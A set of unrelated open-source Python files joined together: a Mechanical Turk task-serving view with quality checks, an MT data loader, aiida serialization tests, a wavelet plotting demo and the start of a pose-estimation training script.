return html_error_response(
request, 'Experiment ID (%s) does not match HIT (%s)' % (
experiment_id, experiment.id)
)
else:
raise Http404
# obtain worker and assignment
worker = get_or_create_mturk_worker_from_request(request)
assignment_dirty = False
if worker and 'assignmentId' in request.GET:
assignment, _ = MtAssignment.objects.get_or_create(
id=request.GET['assignmentId'],
defaults={'hit': hit, 'worker': worker})
if assignment.hit != hit or assignment.worker != worker:
assignment.hit = hit
assignment.worker = worker
assignment_dirty = True
else:
assignment = None
worker = None
# obtain worker info specific to the experiment and worker
if experiment and worker:
experiment_worker, _ = ExperimentWorker.objects.get_or_create(
experiment=experiment, worker=worker)
else:
experiment_worker = None
# don't let blocked workers perform our tasks
if (worker and worker.blocked) or (experiment_worker and experiment_worker.blocked):
message = "Your submissions are too low quality. Please stop doing our tasks."
if experiment_worker and experiment_worker.blocked_reason:
message += "<br/><br/>" + experiment_worker.blocked_reason
elif worker and worker.blocked_reason:
message += "<br/><br/>" + worker.blocked_reason
return html_error_response(request, message)
# fetch contents
hit_contents = fetch_hit_contents(hit)
if override and 'publishable' in request.GET:
hit_contents = filter(lambda x: x and x.publishable(), hit_contents)
if not hit.num_contents or not hit_contents:
# (in the if statement, also test hit.num_contents since it is only set
# after the last content is added)
return html_error_response(
request, "Somehow there are no items in this HIT.")
# fetch test (sentinel) contents
if experiment_worker:
if assignment.num_test_contents is None:
n = experiment.test_contents_per_assignment
if n > 0:
# select new test contents from the set of possible contents
# (that the user has not already answered)
test_content_wrappers = experiment.test_contents.all() \
.exclude(responses__experiment_worker=experiment_worker) \
.order_by('-priority')[:n]
# register chosen items with assignment
assignment.test_contents.add(*test_content_wrappers)
else:
test_content_wrappers = []
assignment.num_test_contents = len(test_content_wrappers)
assignment_dirty = True
elif assignment.num_test_contents > 0:
# re-fetch existing contents
test_content_wrappers = assignment.test_contents.all()
else:
test_content_wrappers = []
# fetch objects from inside the wrappers
if test_content_wrappers:
test_contents = fetch_content_tuples([
(x.content_type_id, x.object_id)
for x in test_content_wrappers
])
else:
test_contents = []
else:
test_contents = []
test_content_wrappers = []
# shuffle together (some tasks may sort contents again in javascript)
contents = hit_contents + test_contents
random.shuffle(contents)
# prepare context data
context = {
'hit': hit,
'assignment': assignment,
'worker': worker,
'experiment': experiment,
'experiment_id': experiment_id,
'experiment_worker': experiment_worker,
'slug': experiment.slug,
'hit_contents': hit_contents,
'test_content_wrappers': test_content_wrappers,
'test_contents': test_contents,
'contents': contents,
'num_contents': len(contents),
'num_contents_predicted': (len(hit_contents) +
experiment.test_contents_per_assignment),
'override': override,
}
if len(contents) == 1:
context['content'] = contents[0]
if experiment.version >= 2:
# old experiments (version 1) don't use this
context['contents_json'] = json.dumps(
[c.get_entry_dict() for c in contents])
# list of ids as json
context['content_id_json'] = json.dumps(
[{'id': c.id} for c in contents])
# requirements
for req in hit.hit_type.requirements.values('name', 'value'):
context[req['name']] = req['value']
if assignment_dirty:
assignment.save()
return context
def external_task_tutorial(request, context):
""" Handle tutorials. On a GET, decide whether to serve up a tutorial.
On a POST, record that the tutorial was completed, then the client will
refresh. Returns either a response or None. """
# unpack some variables
experiment, worker, override = [
context[k] for k in ['experiment', 'worker', 'override']]
if (request.method == "GET" and experiment.has_tutorial and
(override == "tut" or not is_preview_request(request))):
show_tutorial = (override == "tut" or
not context['experiment_worker'].tutorial_completed)
if show_tutorial:
context.update(csrf(request))
template_name = experiment.template_name()
return render(request, '%s_tut.html' % template_name, context)
elif (request.method == "POST" and override is None and
'tutorial_complete' in request.POST and
request.POST['tutorial_complete'] == 'true'):
ew_id = context['experiment_worker'].id
ExperimentWorker.objects.filter(id=ew_id) \
.update(tutorial_completed=True)
return json_success_response()
return None
def external_task_POST(request, context):
""" Handles POSTs for mturk tasks. Returns a response. """
# unpack some variables
experiment, hit, assignment, worker, override, experiment_worker = [
context[k] for k in [
'experiment', 'hit', 'assignment', 'worker', 'override',
'experiment_worker'
]
]
# error checks
if override is not None:
return json_error_response(
"You cannot submit in admin preview mode.")
if not worker or not assignment:
return json_error_response(
"There was an error obtaining your Assignment ID from Amazon.")
# check that POST is allowed
if hit.sandbox and not settings.MTURK_ACCEPT_SANDBOX_HITS:
return json_error_response(
"Not currently accepting sandbox HITs. POST data: " +
json.dumps(request.POST))
# extract submit data
results = json.loads(request.POST['results'])
time_ms = json.loads(request.POST['time_ms']) \
if 'time_ms' in request.POST else None
time_active_ms = json.loads(request.POST['time_active_ms']) \
if 'time_active_ms' in request.POST else None
time_load_ms = json.loads(request.POST['time_load_ms']) \
if 'time_load_ms' in request.POST else None
complete = ('partial' not in request.POST or
str(request.POST['partial']) != 'true')
version = json.loads(request.POST['version'])
action_log = request.POST.get('action_log', '')
screen_width = request.POST.get('screen_width', None)
screen_height = request.POST.get('screen_height', None)
# fix any potential str/int issues
if isinstance(time_ms, basestring) and time_ms.isdigit():
time_ms = int(time_ms)
if isinstance(time_active_ms, basestring) and time_active_ms.isdigit():
time_active_ms = int(time_active_ms)
if isinstance(time_load_ms, basestring) and time_load_ms.isdigit():
time_load_ms = int(time_load_ms)
# store assignment POST information
post_dict = {}
meta_dict = {}
for k, v in request.META.iteritems():
# some non-encodable things get put in here -- filter them out by
# forcing the unicode encoding
try:
meta_dict[unicode(k)] = unicode(v)
except:
pass
for k, v in request.POST.iteritems():
# some non-encodable things get put in here -- filter them out by
# forcing the unicode encoding
try:
post_dict[unicode(k)] = unicode(v)
except:
pass
# store dictionaries, not nested dictionaries
post_dict[u'results'] = recursive_dict_exclude(results, [
u'screenshot'])
post_dict[u'time_ms'] = time_ms
post_dict[u'time_active_ms'] = time_active_ms
post_dict[u'time_load_ms'] = time_load_ms
assignment.post_data = json.dumps(post_dict)
assignment.post_meta = json.dumps(meta_dict)
if 'HTTP_USER_AGENT' in request.META:
assignment.user_agent = request.META['HTTP_USER_AGENT']
assignment_dirty = False
experiment_worker_dirty = False
# update assignment info
if complete:
assignment.time_ms = recursive_sum(time_ms)
assignment.time_active_ms = recursive_sum(time_active_ms)
assignment.time_load_ms = recursive_sum(time_load_ms)
assignment.status = MtAssignment.str_to_status['Submitted']
assignment.submit_time = datetime.datetime.now()
assignment.action_log = action_log
assignment.screen_width = screen_width
assignment.screen_height = screen_height
if 'feedback' in request.POST:
assignment.feedback = request.POST['feedback']
# must fill in at least 2/3 fields to count
if assignment.feedback and len(json.loads(assignment.feedback)) >= 2:
assignment.has_feedback = True
assignment_dirty = True
# mark test contents data as seen. it can't be done async or else the next
# task will re-serve the same test items.
rejected_assignment = False
if assignment.num_test_contents:
experiment_worker = context['experiment_worker']
test_content_wrappers = context['test_content_wrappers']
test_contents = context['test_contents']
# grade test contents
responses, responses_correct = hit.hit_type.experiment_settings \
.out_content_model().mturk_grade_test(
test_content_wrappers, test_contents, results)
# store in database
for i, tcw in enumerate(test_content_wrappers):
# If the user accepts multiple HITs at once, then they can be
# served the same test objects. In that case, only store their
# first answer, since the second time they see it, they will know
# it is a test item.
if not tcw.responses.filter(experiment_worker=experiment_worker).exists():
tcw.responses.create(
experiment_worker=experiment_worker,
assignment=assignment,
response=unicode(responses[i]),
correct=responses_correct[i],
)
# update local correct counts
assignment.num_test_correct = sum(responses_correct)
assignment.num_test_incorrect = sum(not x for x in responses_correct)
assignment_dirty = True
# update global correct counts
experiment_worker.num_test_correct = \
experiment_worker.test_content_responses.filter(correct=True).count()
experiment_worker.num_test_incorrect = \
experiment_worker.test_content_responses.filter(correct=False).count()
experiment_worker_dirty = True
# always approve, but give a message if they do badly
if assignment.num_test_incorrect >= 3 and assignment.num_test_correct == 0:
perc = int(100 * assignment.num_test_correct / (
assignment.num_test_correct + assignment.num_test_incorrect))
message = make_reject_message(experiment, hit, perc)
#from mturk.tasks import reject_assignment_task
from mturk.tasks import approve_assignment_task
approve_assignment_task.apply_async(
kwargs={
'assignment_id': assignment.id,
'feedback': message,
}, countdown=60, retry=True, retry_policy={'max_retries': 100})
rejected_assignment = True
# block if accuracy every creeps below 80% (with at least 5 errors)
if experiment_worker.num_test_incorrect > 5:
perc = int(100 * experiment_worker.num_test_correct / (
experiment_worker.num_test_correct +
experiment_worker.num_test_incorrect))
if perc < 80:
message = make_reject_message(experiment, hit, perc)
experiment_worker.block(reason=message, method='T', save=False)
experiment_worker_dirty = True
# otherwise auto-approve
elif (not rejected_assignment and
(experiment_worker.auto_approve or settings.MTURK_AUTO_APPROVE)):
from mturk.tasks import approve_assignment_task
approve_assignment_task.apply_async(
kwargs={
'assignment_id': assignment.id,
'feedback': experiment_worker.auto_approve_message,
}, countdown=60, retry=True, retry_policy={'max_retries': 100})
if assignment_dirty:
assignment.save()
if experiment_worker_dirty:
experiment_worker.save()
# submit (rest of) data asynchronously
mturk_submit_task.apply_async(
# note: 'contents' not serialized in this list -- the task re-fetches
# this from the database.
kwargs={
'user_id': worker.user_id,
'mturk_hit_id': hit.id,
'mturk_assignment_id': assignment.id,
'experiment_id': experiment.id,
'results': results, # dict with content id as key
'time_ms': time_ms, # number or dict with content id as key
'time_active_ms': time_active_ms, # same format as time_ms
'time_load_ms': time_load_ms,
'complete': complete,
'version': version,
},
retry=True,
retry_policy={
'max_retries': None, # (retry forever)
'interval_start': 300,
'interval_step': 60,
'interval_max': 600,
}
)
# success
return json_success_response()
def make_reject_message(experiment, hit, perc):
"""
perc: percentage correct, ranging from 0 to 100.
"""
# make an experiment-specific reject message
module = experiment.get_module()
if module and hasattr(module, 'make_reject_message'):
message = module.make_reject_message(experiment, hit, perc)
else:
message = None
if not message:
message = (
"We checked some of your answers against our correct answers "
"and found that your accuracy was %s percent, which is too "
"low. This is for the task: %s."
) % (perc, hit.hit_type.title)
return message
def external_task_GET(request, context):
""" Handles GETs for mturk tasks. Returns a response. """
# unpack some variables
override, experiment = [context[k] for k in ['override', 'experiment']]
# template name is based on experiment parameters
if experiment.variant:
variant = json.loads(experiment.variant)
else:
variant = None
context['variant'] = variant
# template names
template_name = experiment.template_name()
context['instructions'] = '%s_inst_content.html' % template_name
context['content_thumb_template'] = '%s_thumb.html' % template_name
# fetch examples from database
publishable = override and 'publishable' in request.GET
external_task_prepare_examples(
context, experiment, publishable=publishable)
# add extra context depending on the task
external_task_extra_context(experiment.slug, context)
# decide if we need feedback
external_task_prepare_feedback(request, context)
if override == "task" or not is_preview_request(request):
context.update(csrf(request))
return render(request, '%s.html' % template_name, context)
else:
return render(request, '%s_inst.html' % template_name, context)
def external_task_prepare_feedback(request, context):
""" Sets the necessary feedback variables """
# unpack some variables
experiment, hit, worker = [
context[k] for k in ['experiment', 'hit', 'worker']
]
# ask for feedback if we haven't gotten any yet, and they have
# completed at least two other HITs
context['ask_for_feedback'] = 'false'
context['feedback_bonus'] = 0
if context['worker'] and context['hit'].hit_type.feedback_bonus is not None:
hit_count = MtAssignment.objects.filter(
worker=worker,
hit__hit_type=hit.hit_type,
).count()
if hit_count == 3 or (hit_count >= 10 and hit_count % 10 == 0):
feedback_count = MtAssignment.objects.filter(
worker=worker,
has_feedback=True,
hit__hit_type__experiment__completed_id=experiment.completed_id,
).count()
if feedback_count == 0:
context['ask_for_feedback'] = 'true'
context['feedback_bonus'] = hit.hit_type.feedback_bonus
def external_task_prepare_examples(
context, experiment, num_examples=16, publishable=False):
""" Prepare good/bad examples for display. publishable: if True, only show
creative-commons generic photos -- only useful for generating screenshots
of tasks for publications. """
if not experiment.examples.exists():
return
# get content model
content_model = experiment.examples.all()[0].__class__
prefetch = get_content_model_prefetch(content_model)
# good examples
examples_good = [obj.content for obj in experiment.examples
.filter(good=True).order_by('?')[:num_examples]
.prefetch_related(*prefetch)]
# try and find matching bad examples
group_attr = experiment.examples_group_attr
if (examples_good and content_model and
group_attr and hasattr(content_model, group_attr)):
group_id = group_attr + '_id'
# object ids, matched on group attribute (e.g. 'shape')
ids = content_model.objects \
.filter(**{
group_id + '__in':
[getattr(c, group_id) for c in examples_good]
}) \
.values_list('id', flat=True)
# fetch matching bad examples
examples_bad = [x.content for x in experiment.examples
.filter(object_id__in=ids, good=False)
.prefetch_related(*prefetch)]
# re-order good examples to put matches first
examples_bad_dict = {getattr(x, group_id): x for x in examples_bad}
examples_good.sort(
key=lambda x: getattr(x, group_id) not in examples_bad_dict)
# re-order bad examples to match good examples ordering
examples_bad = []
for c in examples_good:
if getattr(c, group_id) in examples_bad_dict:
examples_bad.append(examples_bad_dict[getattr(c, group_id)])
# fetch remaining examples
num_extra = num_examples - len(examples_bad)
if num_extra > 0:
new_examples_bad_queryset = experiment.examples \
.filter(good=False) \
.exclude(object_id__in=ids) \
.order_by('?')[:num_extra] \
.prefetch_related(*prefetch)
examples_bad += [
obj.content for obj in new_examples_bad_queryset]
else:
examples_bad = [e.content for e in experiment.examples
.filter(good=False).order_by('?')[:num_examples]
.prefetch_related(*prefetch)]
if examples_good:
if publishable:
examples_good = filter(lambda x: x.publishable(), examples_good)
context['examples_good'] = examples_good
context['examples_good_json'] = json.dumps(
[c.get_entry_dict() for c in examples_good])
if examples_bad:
if publishable:
examples_bad = filter(lambda x: x.publishable(), examples_bad)
context['examples_bad'] = examples_bad
context['examples_bad_json'] = json.dumps(
[c.get_entry_dict() for c in examples_bad])
def external_task_extra_context(slug, context):
""" Add extra context for each task """
module = context['experiment'].get_module()
if module and hasattr(module, 'external_task_extra_context'):
module.external_task_extra_context(slug, context)
|
python/spinn/data/mt/load_mt_data.py | pramitmallick/spinn | 103 | 12690740 | <filename>python/spinn/data/mt/load_mt_data.py
import numpy as np
import json
import codecs
import re
import csv
FIXED_VOCABULARY = None
SENTENCE_PAIR_DATA = False
#source: ( That ( ( 's ( ( a lot ) ( to ( pack ( into ( 18 minutes ) ) ) ) ) ) . ) )
#target: وأخرج ملتحفا فوطتي، كان الجميع يراني .
def load_data(source_path, target_path, trg_language="arabic", src_language="english", data_type="gt", is_lowercase=True):
examples = []
s_file=open(source_path)
t_file=open(target_path)
i=0
for element in zip(s_file.readlines(), t_file.readlines()):
line = element[0].strip()
s_tokens, s_transitions=convert_binary_bracketing(line, data_type=data_type, lowercase=is_lowercase)
if trg_language=="zh":
t_tokens=list(element[1])
else:
t_tokens=element[1].lower().split()
example = {}
example["tokens"] = s_tokens
example["target_tokens"] = t_tokens+["<s>"]#end token for mt predictions.
example["transitions"] = s_transitions
example["example_id"]=i
i+=1
examples.append(example)
return examples
def convert_binary_bracketing(parse, data_type="gt",lowercase=False):
transitions = []
tokens = []
for word in parse.split(' '):
if word[0] != "(":
if word.strip() == ")":
transitions.append(1)
else:
# Downcase all words to match GloVe.
if lowercase:
tokens.append(word.lower())
else:
tokens.append(word)
transitions.append(0)
if(data_type=="lb"):
transitions=lb_build(len(tokens))
elif(data_type=="bal"):
transitions=balanced_transitions(len(tokens))
elif(data_type=="rb"):
transitions=rb_build(len(tokens))
#print(transitions)
return tokens, transitions
def lb_build(N):
if N==2:
return [0,0,1]
else:
return [0,0,1]+(N-2)*[0,1]
def rb_build(N):
return [0]*(N)+[1]*(N-1)
def balanced_transitions(N):
"""
Recursively creates a balanced binary tree with N
leaves using shift reduce transitions.
"""
if N == 3:
return [0, 0, 1, 0, 1]
elif N == 2:
return [0, 0, 1]
elif N == 1:
return [0]
else:
right_N = N // 2
left_N = N - right_N
return balanced_transitions(left_N) + balanced_transitions(right_N) + [1]
|
tests/orm/utils/test_serialize.py | mkrack/aiida-core | 153 | 12690748 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""Tests for the :mod:`aiida.orm.utils.serialize` module."""
import types
import numpy as np
import pytest
from aiida import orm
from aiida.common.links import LinkType
from aiida.orm.utils import serialize
pytestmark = pytest.mark.usefixtures('aiida_profile_clean')
def test_serialize_round_trip():
"""
Test the serialization of a dictionary with Nodes in various data structure
Also make sure that the serialized data is json-serializable
"""
node_a = orm.Data().store()
node_b = orm.Data().store()
data = {'test': 1, 'list': [1, 2, 3, node_a], 'dict': {('Si',): node_b, 'foo': 'bar'}, 'baz': 'aar'}
serialized_data = serialize.serialize(data)
deserialized_data = serialize.deserialize_unsafe(serialized_data)
# For now manual element-for-element comparison until we come up with general
# purpose function that can equate two node instances properly
assert data['test'] == deserialized_data['test']
assert data['baz'] == deserialized_data['baz']
assert data['list'][:3] == deserialized_data['list'][:3]
assert data['list'][3].uuid == deserialized_data['list'][3].uuid
assert data['dict'][('Si',)].uuid == deserialized_data['dict'][('Si',)].uuid
def test_serialize_group():
"""
Test that serialization and deserialization of Groups works.
Also make sure that the serialized data is json-serializable
"""
group_name = 'groupie'
group_a = orm.Group(label=group_name).store()
data = {'group': group_a}
serialized_data = serialize.serialize(data)
deserialized_data = serialize.deserialize_unsafe(serialized_data)
assert data['group'].uuid == deserialized_data['group'].uuid
assert data['group'].label == deserialized_data['group'].label
def test_serialize_node_round_trip():
"""Test you can serialize and deserialize a node"""
node = orm.Data().store()
deserialized = serialize.deserialize_unsafe(serialize.serialize(node))
assert node.uuid == deserialized.uuid
def test_serialize_group_round_trip():
"""Test you can serialize and deserialize a group"""
group = orm.Group(label='test_serialize_group_round_trip').store()
deserialized = serialize.deserialize_unsafe(serialize.serialize(group))
assert group.uuid == deserialized.uuid
assert group.label == deserialized.label
def test_serialize_computer_round_trip(aiida_localhost):
"""Test you can serialize and deserialize a computer"""
deserialized = serialize.deserialize_unsafe(serialize.serialize(aiida_localhost))
# pylint: disable=no-member
assert aiida_localhost.uuid == deserialized.uuid
assert aiida_localhost.label == deserialized.label
def test_serialize_unstored_node():
"""Test that you can't serialize an unstored node"""
node = orm.Data()
with pytest.raises(ValueError):
serialize.serialize(node)
def test_serialize_unstored_group():
"""Test that you can't serialize an unstored group"""
group = orm.Group(label='test_serialize_unstored_group')
with pytest.raises(ValueError):
serialize.serialize(group)
def test_serialize_unstored_computer():
"""Test that you can't serialize an unstored node"""
computer = orm.Computer('test_computer', 'test_host')
with pytest.raises(ValueError):
serialize.serialize(computer)
def test_mixed_attribute_normal_dict():
"""Regression test for #3092.
The yaml mapping constructor in `aiida.orm.utils.serialize` was not properly "deeply" reconstructing nested
mappings, causing a mix of attribute dictionaries and normal dictionaries to lose information in a round-trip.
If a nested `AttributeDict` contained a normal dictionary, the content of the latter would be lost during the
deserialization, despite the information being present in the serialized yaml dump.
"""
from aiida.common.extendeddicts import AttributeDict
# Construct a nested `AttributeDict`, which should make all nested dictionaries `AttributeDicts` recursively
dictionary = {'nested': AttributeDict({'dict': 'string', 'value': 1})}
attribute_dict = AttributeDict(dictionary)
# Now add a normal dictionary in the attribute dictionary
attribute_dict['nested']['normal'] = {'a': 2}
serialized = serialize.serialize(attribute_dict)
deserialized = serialize.deserialize_unsafe(serialized)
assert attribute_dict, deserialized
def test_serialize_numpy():
"""Regression test for #3709
Check that numpy arrays can be serialized.
"""
data = np.array([1, 2, 3])
serialized = serialize.serialize(data)
deserialized = serialize.deserialize_unsafe(serialized)
assert np.all(data == deserialized)
def test_serialize_simplenamespace():
"""Regression test for #3709
Check that `types.SimpleNamespace` can be serialized.
"""
data = types.SimpleNamespace(a=1, b=2.1)
serialized = serialize.serialize(data)
deserialized = serialize.deserialize_unsafe(serialized)
assert data == deserialized
def test_enum():
"""Test serialization and deserialization of an ``Enum``."""
enum = LinkType.RETURN
serialized = serialize.serialize(enum)
assert isinstance(serialized, str)
deserialized = serialize.deserialize_unsafe(serialized)
assert deserialized == enum
|
demo/plot_wavelets.py | SalvoCas/pywt | 1,435 | 12690756 | <reponame>SalvoCas/pywt<filename>demo/plot_wavelets.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Plot scaling and wavelet functions for db, sym, coif, bior and rbio families
import itertools
import matplotlib.pyplot as plt
import pywt
plot_data = [('db', (4, 3)),
('sym', (4, 3)),
('coif', (3, 2))]
for family, (rows, cols) in plot_data:
fig = plt.figure()
fig.subplots_adjust(hspace=0.2, wspace=0.2, bottom=.02, left=.06,
right=.97, top=.94)
colors = itertools.cycle('bgrcmyk')
wnames = pywt.wavelist(family)
i = iter(wnames)
for col in range(cols):
for row in range(rows):
try:
wavelet = pywt.Wavelet(next(i))
except StopIteration:
break
phi, psi, x = wavelet.wavefun(level=5)
color = next(colors)
ax = fig.add_subplot(rows, 2 * cols, 1 + 2 * (col + row * cols))
ax.set_title(wavelet.name + " phi")
ax.plot(x, phi, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(rows, 2*cols, 1 + 2*(col + row*cols) + 1)
ax.set_title(wavelet.name + " psi")
ax.plot(x, psi, color)
ax.set_xlim(min(x), max(x))
for family, (rows, cols) in [('bior', (4, 3)), ('rbio', (4, 3))]:
fig = plt.figure()
fig.subplots_adjust(hspace=0.5, wspace=0.2, bottom=.02, left=.06,
right=.97, top=.94)
colors = itertools.cycle('bgrcmyk')
wnames = pywt.wavelist(family)
i = iter(wnames)
for col in range(cols):
for row in range(rows):
try:
wavelet = pywt.Wavelet(next(i))
except StopIteration:
break
phi, psi, phi_r, psi_r, x = wavelet.wavefun(level=5)
row *= 2
color = next(colors)
ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols))
ax.set_title(wavelet.name + " phi")
ax.plot(x, phi, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(2*rows, 2*cols, 2*(1 + col + row*cols))
ax.set_title(wavelet.name + " psi")
ax.plot(x, psi, color)
ax.set_xlim(min(x), max(x))
row += 1
ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols))
ax.set_title(wavelet.name + " phi_r")
ax.plot(x, phi_r, color)
ax.set_xlim(min(x), max(x))
ax = fig.add_subplot(2*rows, 2*cols, 1 + 2*(col + row*cols) + 1)
ax.set_title(wavelet.name + " psi_r")
ax.plot(x, psi_r, color)
ax.set_xlim(min(x), max(x))
plt.show()
|
naive-dense-unet.py | zhiqiangdon/CU-Net | 213 | 12690788 | <reponame>zhiqiangdon/CU-Net
# <NAME>, May 2017
import sys, warnings, traceback, torch
def warn_with_traceback(message, category, filename, lineno, file=None, line=None):
sys.stderr.write(warnings.formatwarning(message, category, filename, lineno, line))
traceback.print_stack(sys._getframe(2))
warnings.showwarning = warn_with_traceback; warnings.simplefilter('always', UserWarning)
torch.utils.backcompat.broadcast_warning.enabled = True
torch.utils.backcompat.keepdim_warning.enabled = True
import os, time
from PIL import Image, ImageDraw
import numpy as np
from collections import OrderedDict
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim
import torch.utils.data
from options.train_options import TrainOptions
from data.mpii_for_mpii_22 import MPII
from models.naive_dense_unet import create_dense_unet
from utils.util import AverageMeter, adjust_lr
from utils.util import TrainHistory, get_n_params, get_n_trainable_params, get_n_conv_params
from utils.visualizer import Visualizer
from utils.checkpoint import Checkpoint
from utils.logger import Logger
from pylib import HumanAcc, HumanPts, HumanAug, Evaluation
cudnn.benchmark = True
joint_flip_index = np.array([[1, 4], [0, 5],
[12, 13], [11, 14], [10, 15], [2, 3]])
def main():
opt = TrainOptions().parse()
train_history = TrainHistory()
checkpoint = Checkpoint()
visualizer = Visualizer(opt)
exp_dir = os.path.join(opt.exp_dir, opt.exp_id)
log_name = opt.vis_env + 'log.txt'
visualizer.log_name = os.path.join(exp_dir, log_name)
os.environ['CUDA_VISIBLE_DEVICES'] = opt.gpu_id
# if opt.dataset == 'mpii':
num_classes = 16
layer_num = 8
net = create_dense_unet(neck_size=4, growth_rate=32, init_chan_num=128,
num_classes=num_classes, layer_num=layer_num)
# num1 = get_n_params(net)
# num2 = get_n_trainable_params(net)
# num3 = get_n_conv_params(net)
# print 'number of params: ', num1
# print 'number of trainalbe params: ', num2
# print 'number of conv params: ', num3
# torch.save(net.state_dict(), 'test-model-size.pth.tar')
# exit()
# device = torch.device("cuda:0")
# net = net.to(device)
net = torch.nn.DataParallel(net).cuda()
optimizer = torch.optim.RMSprop(net.parameters(), lr=opt.lr, alpha=0.99,
eps=1e-8, momentum=0, weight_decay=0)
"""optionally resume from a checkpoint"""
if opt.resume_prefix != '':
# if 'pth' in opt.resume_prefix:
# trunc_index = opt.resume_prefix.index('pth')
# opt.resume_prefix = opt.resume_prefix[0:trunc_index - 1]
# checkpoint.save_prefix = os.path.join(exp_dir, opt.resume_prefix)
checkpoint.save_prefix = exp_dir + '/'
checkpoint.load_prefix = os.path.join(exp_dir, opt.resume_prefix)[0:-1]
checkpoint.load_checkpoint(net, optimizer, train_history)
opt.lr = optimizer.param_groups[0]['lr']
resume_log = True
else:
checkpoint.save_prefix = exp_dir + '/'
resume_log = False
print 'save prefix: ', checkpoint.save_prefix
# model = {'state_dict': net.state_dict()}
# save_path = checkpoint.save_prefix + 'test-model-size.pth.tar'
# torch.save(model, save_path)
# exit()
"""load data"""
train_loader = torch.utils.data.DataLoader(
MPII('dataset/mpii-hr-lsp-normalizer.json', '/bigdata1/zt53/data', is_train=True),
batch_size=opt.bs, shuffle=True,
num_workers=opt.nThreads, pin_memory=True)
val_loader = torch.utils.data.DataLoader(
MPII('dataset/mpii-hr-lsp-normalizer.json', '/bigdata1/zt53/data', is_train=False),
batch_size=opt.bs, shuffle=False,
num_workers=opt.nThreads, pin_memory=True)
"""optimizer"""
# optimizer = torch.optim.SGD( net.parameters(), lr=opt.lr,
# momentum=opt.momentum,
# weight_decay=opt.weight_decay )
# optimizer = torch.optim.RMSprop(net.parameters(), lr=opt.lr, alpha=0.99,
# eps=1e-8, momentum=0, weight_decay=0)
print type(optimizer)
# idx = range(0, 16)
# idx = [e for e in idx if e not in (6, 7, 8, 9, 12, 13)]
idx = [0, 1, 2, 3, 4, 5, 10, 11, 14, 15]
logger = Logger(os.path.join(opt.exp_dir, opt.exp_id, 'training-summary.txt'),
title='training-summary', resume=resume_log)
logger.set_names(['Epoch', 'LR', 'Train Loss', 'Val Loss', 'Train Acc', 'Val Acc'])
if not opt.is_train:
visualizer.log_path = os.path.join(opt.exp_dir, opt.exp_id, 'val_log.txt')
val_loss, val_pckh, predictions = validate(val_loader, net,
train_history.epoch[-1]['epoch'],
visualizer, idx, joint_flip_index,
num_classes)
checkpoint.save_preds(predictions)
return
"""training and validation"""
start_epoch = 0
if opt.resume_prefix != '':
start_epoch = train_history.epoch[-1]['epoch'] + 1
for epoch in range(start_epoch, opt.nEpochs):
adjust_lr(opt, optimizer, epoch)
# # train for one epoch
train_loss, train_pckh = train(train_loader, net, optimizer,
epoch, visualizer, idx, opt)
# evaluate on validation set
val_loss, val_pckh, predictions = validate(val_loader, net, epoch,
visualizer, idx, joint_flip_index,
num_classes)
# visualizer.display_imgpts(imgs, pred_pts, 4)
# exit()
# update training history
e = OrderedDict([('epoch', epoch)])
lr = OrderedDict([('lr', optimizer.param_groups[0]['lr'])])
loss = OrderedDict([('train_loss', train_loss), ('val_loss', val_loss)])
pckh = OrderedDict([('val_pckh', val_pckh)])
train_history.update(e, lr, loss, pckh)
checkpoint.save_checkpoint(net, optimizer, train_history, predictions)
# visualizer.plot_train_history(train_history)
logger.append([epoch, optimizer.param_groups[0]['lr'], train_loss,
val_loss, train_pckh, val_pckh])
logger.close()
# exit()
# if train_history.is_best:
# visualizer.display_imgpts(imgs, pred_pts, 4)
def train(train_loader, net, optimizer, epoch, visualizer, idx, opt):
# batch_time = AverageMeter()
# data_time = AverageMeter()
losses = AverageMeter()
pckhs = AverageMeter()
pckhs_origin_res = AverageMeter()
# switch to train mode
net.train()
# end = time.time()
for i, (img, heatmap, c, s, r, grnd_pts,
normalizer) in enumerate(train_loader):
# """measure data loading time"""
# data_time.update(time.time() - end)
# input and groundtruth
# img_var = torch.autograd.Variable(img)
img = img.cuda(non_blocking=True)
heatmap = heatmap.cuda(non_blocking=True)
# target_var = torch.autograd.Variable(heatmap)
# output and loss
# output1, output2 = net(img_var)
# loss = (output1 - target_var) ** 2 + (output2 - target_var) ** 2
output = net(img)
# exit()
# print(type(output))
# print(len(output))
tmp_loss = (output - heatmap) ** 2
loss = tmp_loss.sum() / tmp_loss.numel()
# for per_out in output:
# tmp_loss = (per_out - heatmap) ** 2
# loss = loss + tmp_loss.sum() / tmp_loss.numel()
# gradient and do SGD step
optimizer.zero_grad()
loss.backward()
optimizer.step()
# """measure optimization time"""
# batch_time.update(time.time() - end)
# end = time.time()
# print log
losses.update(loss.item())
pckh = Evaluation.accuracy(output.cpu(), heatmap.cpu(), idx)
pckhs.update(pckh[0])
pckh_origin_res = Evaluation.accuracy_origin_res(output.cpu(),
c, s, [64, 64],
grnd_pts, normalizer, r)
pckhs_origin_res.update(pckh_origin_res[0])
loss_dict = OrderedDict([('loss', losses.avg),
('pckh', pckhs.avg),
('pckh_origin_res', pckhs_origin_res.avg)])
if i % opt.print_freq == 0 or i == len(train_loader) - 1:
visualizer.print_log(epoch, i, len(train_loader),
value1=loss_dict)
# if i == 1:
# break
return losses.avg, pckhs_origin_res.avg
def validate(val_loader, net, epoch, visualizer, idx, joint_flip_index, num_classes):
batch_time = AverageMeter()
losses = AverageMeter()
pckhs = AverageMeter()
pckhs_origin_res = AverageMeter()
img_batch_list = []
pts_batch_list = []
predictions = torch.Tensor(val_loader.dataset.__len__(), num_classes, 2)
# switch to evaluate mode
net.eval()
# end = time.time()
with torch.no_grad():
for i, (img, heatmap, center, scale, rot, grnd_pts,
normalizer, index) in enumerate(val_loader):
# input and groundtruth
# input_var = torch.autograd.Variable(img, volatile=True)
input = img.cuda(non_blocking=True)
heatmap = heatmap.cuda(non_blocking=True)
# target_var = torch.autograd.Variable(heatmap)
# output and loss
# output1, output2 = net(input_var)
